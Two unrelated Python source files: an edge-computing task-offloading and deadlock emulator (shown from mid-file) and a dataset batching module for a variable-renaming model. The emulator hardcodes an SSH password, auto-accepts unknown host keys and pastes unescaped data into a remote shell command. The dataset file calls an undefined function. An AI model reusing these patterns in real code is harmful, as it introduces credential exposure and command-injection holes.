# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
logger.info('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
logger.info('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
logger.info('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = []
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
if len(exec_list) != len(offloaded_task[0]):
# logger.info('\n\n', '@ ' * 50)
logger.info(f'exec: {exec_list} off: {offloaded_task[0]}')
# logger.info('\n\n', '@ ' * 50)
offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in exec_list: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# logger.info('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
logger.info(f'\nExecuting : {local}')
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
logger.info('#{}'.format(local.index(i) + 1) + f' Executed: {i}')
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# else:
# logger.info('else execute: ', j)
logger.info('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
logger.info('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
logger.info('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list
while True:
if stop():
logger.info('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
logger.info("Email sent!")
except Exception as e:
logger.info(str(e))
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
logger.info(str(e))
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
logger.info(str(e))
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_3_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}" \
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_3_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}",
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record} ",
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}\n",
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}"
]
file_ = open(f'{_id_}_3_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
cmd = f'mv {_id_}_3_{mec_no}datap.py {send_path}'
os.system(cmd)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
logger.info('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# logger.info('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
logger.info('algorithm is starting....')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
logger.info(f'EDF List of Processes: {tasks}\n')
logger.info('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
logger.info(f'\nWaiting Time List: {wait_list}')
compare_result = compare_local_mec(wait_list)
logger.info(f'\nExecute Locally: {compare_result[1]}')
_loc += len(compare_result[1]) # total number of tasks to be executed locally
logger.info(f'\nExecute in MEC: {compare_result[0]}')
if len(compare_result[0]) > 0:
logger.info('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
logger.info('\nProgramme Terminated')
stop = False
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
logger.info('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
logger.info(f'mec ip: {ip_address()}')
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
logger.info(f'MEC Details: {hosts}')
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
logger.info('saving data')
save_and_send(send_path)
logger.info('send alert to control')
time.sleep(r.uniform(1, 10))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
logger.info('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_) , (--hosts, --mec_no_, --cloud_ip, --s_path, --b_ip)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
# h_hosts = ast.literal_eval(args.hosts)
l_host, l_len = args.hosts.split('_'), len(args.hosts.split('_'))
h_hosts = dict(zip(l_host[:l_len//2], l_host[l_len//2:]))
f_name = os.path.basename(__file__).split('/')[-1].split('.')[0]
tim = dt.datetime.now().strftime("%a_%H%M")
name = f'logs/{f_name}_{tim}_{args.mec_no}'
file_handler = logging.FileHandler(name)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info('Process Started')
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
dataset.py
|
import glob
import pickle
import sys
import os
import gc
import time
import ujson as json
import tarfile
from typing import Iterable, List, Dict, Union, Tuple
import multiprocessing
import threading
import queue
from tqdm import tqdm
import numpy as np
from utils import nn_util
from utils.ast import AbstractSyntaxTree, SyntaxNode
from utils.code_processing import annotate_type
from utils.graph import PackedGraph
from utils.vocab import VocabEntry, SAME_VARIABLE_TOKEN, Vocab
import sentencepiece as spm
import random
import torch
import torch.multiprocessing as torch_mp
batcher_sync_msg = None
torch.multiprocessing.set_sharing_strategy('file_system')
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (4096, rlimit[1]))
class Example(object):
def __init__(self, ast: AbstractSyntaxTree, variable_name_map: dict, **kwargs):
self.ast = ast
self.variable_name_map = variable_name_map
for key, val in kwargs.items():
setattr(self, key, val)
@classmethod
def from_json_dict(cls, json_dict, **kwargs):
tree = AbstractSyntaxTree.from_json_dict(json_dict)
variable_name_map = dict()
for var_name, var_nodes in tree.variables.items():
variable_name_map[var_name] = var_nodes[0].new_name
if 'test_meta' in json_dict:
kwargs['test_meta'] = json_dict['test_meta']
return cls(tree, variable_name_map, **kwargs)
class Batch(object):
__slots__ = ('examples', 'tensor_dict')
def __init__(self, examples, tensor_dict):
self.examples = examples
self.tensor_dict = tensor_dict
@property
def size(self):
return self.tensor_dict['batch_size']
class Batcher(object):
def __init__(self, config, train=True):
self.config = config
self.train = train
# model specific config
self.is_ensemble = config['encoder']['type'] == 'EnsembleModel'
if not self.is_ensemble:
self.vocab = Vocab.load(config['data']['vocab_file'])
self.grammar = self.vocab.grammar
self.use_seq_encoder = config['encoder']['type'] == 'SequentialEncoder' or config['encoder']['type'] == 'XfmrSequentialEncoder'
self.use_hybrid_encoder = config['encoder']['type'] == 'HybridEncoder'
self.init_gnn_with_seq_encoding = config['encoder']['type'] == 'GraphASTEncoder' and config['encoder']['init_with_seq_encoding']
@property
def annotate_sequential_input(self):
return self.use_seq_encoder or self.use_hybrid_encoder or self.init_gnn_with_seq_encoding
def annotate_example(self, example) -> Example:
"""annotate examples by populating specific fields, useful for sorting examples or batching"""
# for ensemble models, it will be annotated by the batcher for each specific class
if self.is_ensemble:
return example
if self.annotate_sequential_input:
src_bpe_model = self.vocab.source_tokens.subtoken_model
snippet = example.code_tokens
# np.random.shuffle(snippet)
snippet = ' '.join(snippet)
sub_tokens = ['<s>'] + src_bpe_model.encode_as_pieces(snippet)[:510] + ['</s>']
sub_token_ids = [src_bpe_model.bos_id()] + src_bpe_model.encode_as_ids(snippet)[:510] + [src_bpe_model.eos_id()]
setattr(example, 'sub_tokens', sub_tokens)
setattr(example, 'sub_token_ids', sub_token_ids)
setattr(example, 'source_seq_length', len(sub_tokens))
tgt_bpe_model = self.vocab.target.subtoken_model
eov_id = tgt_bpe_model.eos_id()
variable_name_subtoken_map = dict()
tgt_pred_seq_len = 0
for old_name, new_name in example.variable_name_map.items():
if old_name == new_name:
subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN], eov_id]
else:
subtoken_ids = tgt_bpe_model.encode_as_ids(new_name) + [eov_id]
variable_name_subtoken_map[old_name] = subtoken_ids
tgt_pred_seq_len += len(subtoken_ids)
setattr(example, 'variable_name_subtoken_map', variable_name_subtoken_map)
setattr(example, 'target_prediction_seq_length', tgt_pred_seq_len)
return example
def sort_training_examples(self, examples):
def _key(_example):
if self.use_seq_encoder:
return _example.source_seq_length
elif self.is_ensemble:
return len(_example.ast.code)
else:
return _example.target_prediction_seq_length
examples.sort(key=_key)
return examples
def get_batch_size(self, examples: List[Example]):
if self.is_ensemble:
return len(examples)
if self.annotate_sequential_input:
return len(examples) * max(e.source_seq_length for e in examples)
else:
return len(examples) * max(e.target_prediction_seq_length for e in examples)
def to_tensor_dict(self, examples: List[Example], return_prediction_target=True) -> Dict[str, torch.Tensor]:
from model.sequential_encoder import SequentialEncoder
from model.xfmr_sequential_encoder import XfmrSequentialEncoder
from model.graph_encoder import GraphASTEncoder
if not hasattr(examples[0], 'target_prediction_seq_length'):
for example in examples:
self.annotate_example(example)
if self.config['encoder']['type'] == 'GraphASTEncoder':
init_with_seq_encoding = self.config['encoder']['init_with_seq_encoding']
packed_graph, tensor_dict = GraphASTEncoder.to_packed_graph([e.ast for e in examples],
connections=self.config['encoder']['connections'],
init_with_seq_encoding=init_with_seq_encoding)
if init_with_seq_encoding:
seq_tensor_dict = SequentialEncoder.to_tensor_dict(examples)
tensor_dict['seq_encoder_input'] = seq_tensor_dict
_tensors = GraphASTEncoder.to_tensor_dict(packed_graph,
self.grammar, self.vocab)
tensor_dict.update(_tensors)
elif self.config['encoder']['type'] == 'SequentialEncoder':
tensor_dict = SequentialEncoder.to_tensor_dict(examples)
elif self.config['encoder']['type'] == 'XfmrSequentialEncoder':
tensor_dict = XfmrSequentialEncoder.to_tensor_dict(examples)
elif self.config['encoder']['type'] == 'HybridEncoder':
packed_graph, gnn_tensor_dict = GraphASTEncoder.to_packed_graph([e.ast for e in examples],
connections=self.config['encoder']['graph_encoder']['connections'])
gnn_tensors = GraphASTEncoder.to_tensor_dict(packed_graph, self.grammar, self.vocab)
gnn_tensor_dict.update(gnn_tensors)
seq_tensor_dict = SequentialEncoder.to_tensor_dict(examples)
tensor_dict = {'graph_encoder_input': gnn_tensor_dict,
'seq_encoder_input': seq_tensor_dict}
else:
raise ValueError('UnknownEncoderType')
if self.train or return_prediction_target:
prediction_target = self.to_batched_prediction_target(examples)
tensor_dict['prediction_target'] = prediction_target
if not self.train:
if hasattr(examples[0], 'test_meta'):
tensor_dict['test_meta'] = [e.test_meta for e in examples]
tensor_dict['batch_size'] = len(examples)
num_elements = nn_util.get_tensor_dict_size(tensor_dict)
tensor_dict['num_elements'] = num_elements
return tensor_dict
def to_batch(self, examples: List[Example], return_examples=False, return_prediction_target=True) -> Batch:
if self.is_ensemble:
# do not perform tensorization for the parent ensemble model
tensor_dict = None
else:
with torch.no_grad():
tensor_dict = self.to_tensor_dict(examples, return_prediction_target)
if not return_examples:
batch = Batch(None, tensor_dict)
del examples[:]
else:
batch = Batch(examples, tensor_dict)
return batch
def to_batched_prediction_target(self, examples: List[Example]):
batch_size = len(examples)
unchanged_var_weight = self.config['train']['unchanged_variable_weight']
use_bpe_for_var_name = self.vocab.target.subtoken_model is not None
variable_name_subtoken_maps = []
if use_bpe_for_var_name:
# eov_id = self.vocab.target.subtoken_model.eos_id()
# for var_name_map in variable_name_maps:
# var_name_subtoken_map = dict()
# for old_name, new_name in var_name_map.items():
# if old_name == new_name:
# subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN], eov_id]
# else:
# subtoken_ids = self.vocab.target.subtoken_model.encode_as_ids(new_name) + [eov_id]
# var_name_subtoken_map[old_name] = subtoken_ids
variable_name_subtoken_maps = [e.variable_name_subtoken_map for e in examples]
else:
for example in examples:
var_name_map = example.variable_name_map
var_name_subtoken_map = dict()
for old_name, new_name in var_name_map.items():
if old_name == new_name:
subtoken_ids = [self.vocab.target[SAME_VARIABLE_TOKEN]]
else:
subtoken_ids = [self.vocab.target[new_name]]
var_name_subtoken_map[old_name] = subtoken_ids
variable_name_subtoken_maps.append(var_name_subtoken_map)
max_pred_timestep = max(sum(len(val) for val in x.values()) for x in variable_name_subtoken_maps)
target_variable_encoding_indices = torch.zeros(batch_size, max_pred_timestep, dtype=torch.long)
target_variable_encoding_indices_mask = torch.zeros(batch_size, max_pred_timestep)
variable_tgt_name_id = torch.zeros(batch_size, max_pred_timestep, dtype=torch.long)
variable_tgt_name_weight = torch.zeros(batch_size, max_pred_timestep)
var_with_new_name_mask = torch.zeros(batch_size, max_pred_timestep)
auxiliary_var_mask = torch.zeros(batch_size, max_pred_timestep)
variable_master_node_ptr = 0
for e_id, example in enumerate(examples):
ast = example.ast
var_name_map = example.variable_name_map
_var_node_ids = []
_tgt_name_ids = []
variable_ptr = 0
for var_id, var_name in enumerate(ast.variables):
new_var_name_subtoken_ids = variable_name_subtoken_maps[e_id][var_name]
variable_end_ptr = variable_ptr + len(new_var_name_subtoken_ids)
variable_tgt_name_id[e_id, variable_ptr: variable_end_ptr] = torch.tensor(new_var_name_subtoken_ids, dtype=torch.long)
if var_name == var_name_map[var_name]:
auxiliary_var_mask[e_id, variable_ptr: variable_end_ptr] = 1.
variable_tgt_name_weight[e_id, variable_ptr: variable_end_ptr] = unchanged_var_weight
else:
var_with_new_name_mask[e_id, variable_ptr: variable_end_ptr] = 1.
variable_tgt_name_weight[e_id, variable_ptr: variable_end_ptr] = 1.
target_variable_encoding_indices[e_id, variable_ptr: variable_end_ptr] = var_id # variable_master_node_ptr
variable_master_node_ptr += 1
variable_ptr = variable_end_ptr
target_variable_encoding_indices_mask[e_id, :variable_ptr] = 1.
return dict(variable_tgt_name_id=variable_tgt_name_id,
variable_tgt_name_weight=variable_tgt_name_weight,
var_with_new_name_mask=var_with_new_name_mask,
auxiliary_var_mask=auxiliary_var_mask,
target_variable_encoding_indices=target_variable_encoding_indices,
target_variable_encoding_indices_mask=target_variable_encoding_indices_mask)
def get_json_iterator_from_tar_file(file_paths, shuffle=False, progress=False, group_by=None, buffer=True) -> Iterable:
assert group_by in (None, 'binary_file')
# if shuffle:
# assert buffer is False
if isinstance(file_paths, str):
file_paths = [file_paths]
if shuffle:
np.random.shuffle(file_paths)
for file_path in file_paths:
payloads = []
t1 = time.time()
with tarfile.open(file_path, 'r') as f:
files = [x.name for x in f.getmembers() if x.name.endswith('.jsonl')]
# if shuffle:
# np.random.shuffle(files)
if progress: file_iter = tqdm(files, file=sys.stdout)
else: file_iter = files
for filename in file_iter:
jsonl_file = f.extractfile(filename)
if jsonl_file is not None:
if group_by is None:
for line_no, tree_encoding_line in enumerate(jsonl_file):
# if tree_encoding_line.decode().startswith('{'):
# tree_json_dict = json.loads(tree_encoding_line)
payload = tree_encoding_line, dict(file_name=filename, line_num=line_no)
if buffer:
payloads.append(payload)
else:
yield payload
elif group_by == 'binary_file':
lines = [(l.decode().strip(), dict(file_name=filename, line_num=line_no))
for line_no, l in enumerate(jsonl_file)]
yield lines
if shuffle:
np.random.shuffle(payloads)
print(f'load shard {file_path} took {time.time() - t1:.4f}s', file=sys.stderr)
for payload in payloads:
yield payload
def json_line_reader(file_path, queue, worker_num, shuffle, progress, group_by=None, buffer=True):
for json_str in get_json_iterator_from_tar_file(file_path, shuffle, progress, group_by=group_by, buffer=buffer):
queue.put(json_str)
for i in range(worker_num):
queue.put(None)
def is_valid_training_example(example):
if hasattr(example, 'target_prediction_seq_length'):
if example.target_prediction_seq_length >= 200: return False
return example.ast.size < 300 and \
len(example.variable_name_map) > 0 #and \
# any(k != v for k, v in example.variable_name_map.items())
def example_generator(json_queue, example_queue, consumer_num=1):
while True:
payload = json_queue.get()
if payload is None: break
json_str, meta = payload
tree_json_dict = json.loads(json_str)
if 'code_tokens' in tree_json_dict:
example = Example.from_json_dict(tree_json_dict, binary_file=meta, code_tokens=tree_json_dict['code_tokens'])
else:
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
example_queue.put(example)
for i in range(consumer_num):
example_queue.put(None)
# print('[Example Generator] example generator process quit!')
def example_to_batch(json_queue, batched_examples_queue, batch_size, train, config, worker_manager_lock, return_examples=False, return_prediction_target=True):
batcher = Batcher(config, train)
buffer_size = config['train']['buffer_size']
buffer = []
print(f'[ExampleToBatch] pid={os.getpid()}', file=sys.stderr)
def _generate_batches():
# buffer.sort(key=batcher.train_example_sort_key)
batcher.sort_training_examples(buffer)
batches = []
batch_examples = []
for example in buffer:
batch_size_with_example = batcher.get_batch_size(batch_examples + [example])
if batch_examples and batch_size_with_example > batch_size:
batches.append(batch_examples)
batch_examples = []
batch_examples.append(example)
if batch_examples:
batches.append(batch_examples)
if train:
random.shuffle(batches)
for batch_examples in batches:
batch = batcher.to_batch(batch_examples, return_examples=return_examples, return_prediction_target=return_prediction_target)
# while batched_examples_queue.qsize() > 100:
# time.sleep(10)
# print(batch.tensor_dict['num_elements'])
while worker_manager_lock.value == 1:
time.sleep(0.2)
batched_examples_queue.put(batch)
# print(f'[ExampleToBatch] batched examples queue size {batched_examples_queue.qsize()}', file=sys.stderr)
buffer.clear()
gc.collect()
finished = False
while True:
t1 = time.time()
while len(buffer) < buffer_size:
payload = json_queue.get()
if payload is None:
finished = True
break
json_str, meta = payload
tree_json_dict = json.loads(json_str)
if 'code_tokens' in tree_json_dict:
example = Example.from_json_dict(tree_json_dict, binary_file=meta,
code_tokens=tree_json_dict['code_tokens'])
else:
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
batcher.annotate_example(example)
if train:
if is_valid_training_example(example):
buffer.append(example)
else:
buffer.append(example)
# print(f'[ExampleToBatch] {time.time() - t1}s took for loading {buffer_size} examples to buffer', file=sys.stderr)
_generate_batches()
# print(f'[ExampleToBatch] {time.time() - t1}s took for batching', file=sys.stderr)
if finished:
break
batched_examples_queue.put(None)
while batcher_sync_msg.value == 0:
time.sleep(1)
print(f'[ExampleToBatch] quit', file=sys.stderr)
sys.stderr.flush()
def worker_manager(worker_result_queue, out_queue, num_workers, worker_manager_lock, buffer_size):
num_finished_workers = 0
patience = 0
prev_queue_size = -1
while True:
finished = False
# t0 = time.time()
try:
queue_size = worker_result_queue.qsize()
except:
queue_size = 999999 # just trigger data loading, for max os X
# print(f'[LocalWorkerManager] queue size={queue_size}, patience={patience}', file=sys.stderr)
if (queue_size > buffer_size or patience >= 10) and out_queue.qsize() < buffer_size:
worker_manager_lock.value = 1
patience = 0
# print(f'[LocalWorkerManager] start loading {queue_size} batches...', file=sys.stderr)
i = 0
while not worker_result_queue.empty() and i < buffer_size:
batch = worker_result_queue.get()
# print(f'[LocalWorkerManager] {time.time() - t0} took to load a batch, size={worker_result_queue.qsize()}', file=sys.stderr)
if batch is not None:
out_queue.put(batch)
else:
num_finished_workers += 1
if num_finished_workers == num_workers:
finished = True
break
i += 1
# print(f'[LocalWorkerManager] loaded {i} batches...', file=sys.stderr)
worker_manager_lock.value = 0
else:
if queue_size == prev_queue_size:
patience += 1
prev_queue_size = queue_size
time.sleep(0.2)
if finished: break
out_queue.put(None)
class Dataset(object):
def __init__(self, file_paths):
if isinstance(file_paths, list):
self.file_paths = file_paths
else:
assert isinstance(file_paths, str)
self.file_paths = glob.glob(file_paths)
print(f'reading data files {self.file_paths}', file=sys.stderr)
example_num = 0
for _ in get_json_iterator_from_tar_file(self.file_paths):
example_num += 1
self.size = example_num
def __len__(self):
return self.size
def __iter__(self):
return self.get_iterator(progress=True)
def get_single_process_iterator(self, shuffle=False, progress=False) -> Iterable[Example]:
json_str_iter = get_json_iterator_from_tar_file(self.file_paths, shuffle, progress)
for json_str, meta in json_str_iter:
tree_json_dict = json.loads(json_str)
example = Example.from_json_dict(tree_json_dict, binary_file=meta)
if example.ast.size != max(node.node_id for node in example.ast) + 1:
continue
yield example
def _get_iterator(self, shuffle=False, num_workers=1):
json_enc_queue = multiprocessing.Queue()
example_queue = multiprocessing.Queue(maxsize=5000)
json_loader = multiprocessing.Process(target=json_line_reader, args=(self.file_paths, json_enc_queue, num_workers,
shuffle, False, None, False))
json_loader.daemon = True
example_generators = []
for i in range(num_workers):
p = multiprocessing.Process(target=example_generator,
args=(json_enc_queue, example_queue, 1))
p.daemon = True
example_generators.append(p)
json_loader.start()
for p in example_generators: p.start()
num_finished_workers = 0
while True:
example = example_queue.get()
if example is not None:
yield example
else:
num_finished_workers += 1
if num_finished_workers == num_workers: break
json_loader.join()
for p in example_generators: p.join()
def get_iterator(self, shuffle=False, progress=True, num_workers=1):
if progress:
it_func = lambda x: tqdm(x, total=len(self), file=sys.stdout)
else:
it_func = lambda x: x
return it_func(self._get_iterator(shuffle, num_workers))
def batch_iterator(self, batch_size: int, config: Dict,
return_examples=False,
return_prediction_target=None,
num_readers=3,
num_batchers=3,
progress=True, train=False, single_batcher=False) -> Iterable[Union[Batch, Dict[str, torch.Tensor]]]:
if progress:
it_func = lambda x: tqdm(x, file=sys.stdout)
else:
it_func = lambda x: x
if single_batcher:
return it_func(self._single_process_batch_iter(batch_size, config, num_readers, train))
else:
return it_func(self._batch_iterator(batch_size, config, num_readers, num_batchers, train, return_examples, return_prediction_target))
def _batch_iterator(self, batch_size: int, config: Dict, num_readers, num_batchers, train=False, return_examples=False, return_prediction_target=None) -> Iterable[Batch]:
global batcher_sync_msg
batcher_sync_msg = multiprocessing.Value('i', 0)
json_enc_queue = multiprocessing.Queue(maxsize=10000)
worker_manager_lock = multiprocessing.Value('i', 0)
json_loader = multiprocessing.Process(target=json_line_reader,
args=(self.file_paths, json_enc_queue, num_readers,
train, False))
json_loader.daemon = True
example_generators = []
worker_result_queue = torch_mp.Queue(maxsize=150)
if return_prediction_target is None:
return_prediction_target = train
for i in range(num_readers):
p = multiprocessing.Process(target=example_to_batch,
args=(json_enc_queue, worker_result_queue, batch_size, train, config, worker_manager_lock, return_examples, return_prediction_target))
p.daemon = True
example_generators.append(p)
json_loader.start()
for p in example_generators: p.start()
batch_queue = queue.Queue(maxsize=100)
worker_manager_thread = threading.Thread(target=worker_manager, args=(worker_result_queue, batch_queue, num_readers, worker_manager_lock, 100))
worker_manager_thread.start()
while True:
# t1 = time.time()
main_process_queue_get_lock = 1
batch = batch_queue.get()
# print(f'[MainThread] local batch queue size {batch_queue.qsize()}', file=sys.stderr)
# print(f'{time.time() - t1} took to load a batch', file=sys.stderr)
if batch is None:
break
else:
yield batch
worker_result_queue.close()
# print('start joining...')
batcher_sync_msg.value = 1
json_loader.join()
# print('json_loader quitted')
for p in example_generators: p.join()
worker_manager_thread.join()
# print('example generators quitted')
# print('batchers quiteed')
sys.stdout.flush()
sys.stderr.flush()
def _single_process_batch_iter(self, batch_size: int, config: Dict, num_readers=2, shuffle=False) -> Iterable[Batch]:
batcher = Batcher(config)
example_iter = self.get_iterator(shuffle=shuffle, progress=False, num_workers=num_readers)
# t1 = time.time()
batch_examples = []
batch_node_num = 0
# if example.ast.size < 300 and len(example.variable_name_map) > 0:
for example in filter(is_valid_example, example_iter):
batch_examples.append(example)
batch_node_num += example.ast.size
if batch_node_num >= batch_size:
batch = batcher.to_batch(batch_examples)
# print(f'[Dataset] {time.time() - t1} took to load a batch', file=sys.stderr)
yield batch
batch_examples = []
batch_node_num = 0
# t1 = time.time()
if batch_examples:
batch = batcher.to_batch(batch_examples)
yield batch
if __name__ == '__main__':
for _example in Dataset('data/0-trees.tar.gz'):
if _example.ast.size > 200:
print(_example.binary_file, _example.variable_name_map)
|
